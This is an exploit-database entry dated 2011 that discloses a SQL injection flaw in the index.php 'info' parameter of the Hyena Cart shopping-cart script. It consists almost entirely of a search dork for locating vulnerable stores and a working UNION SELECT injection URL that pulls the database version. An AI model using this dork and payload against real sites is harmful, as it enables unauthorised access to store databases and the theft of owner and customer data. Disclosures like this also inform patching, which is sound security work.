id: 15467
date: 02/24/2011
title: Hyena Cart (index.php) SQL Injection Vulnerability
author: AtT4CKxT3rR0r1ST
cves: 

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://hyenacart.com/
.:. Dork           : "This store is powered by Hyena Cart"
.:. Home           : http://www.sec-risk.com/vb/
 
####################################################################
 
===[ Exploit ]===
 
www.site.com/index.php?info=null[Sql]
 
www.site.com/index.php?info=null+and+1=2+union+select+1,version(),3,4,5,6
#################################################################### 



#  0day.today [2023-03-22]  #